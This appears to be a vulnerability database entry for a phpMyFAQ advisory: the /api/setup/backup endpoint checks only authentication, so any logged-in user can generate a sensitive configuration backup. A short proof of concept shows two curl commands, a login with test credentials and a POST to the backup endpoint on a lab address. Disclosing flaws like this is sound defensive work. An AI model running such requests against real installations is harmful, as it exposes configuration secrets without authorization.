logo

Database

Improper authorization control for web services In phpmyfaq/phpmyfaq

Description

phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing)

Summary

Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP.

Details

SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged‑in user to create a sensitive backup and retrieve its path.

PoC

Precondition: API enabled, any authenticated non‑admin user.

    Log in as a non‑admin user.

    Call backup endpoint.

curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login

curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup...

Impact

Low‑privileged users can generate sensitive backups. If the ZIP is web‑accessible (server misconfiguration), this can lead to secret exposure.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-244212. NVD-2026-244213. OSV-2026-244214. GHSA-wm8h-26fv-mg7g5. GCVE-2026-24421

References

1. https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-wm8h-26fv-mg7g

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.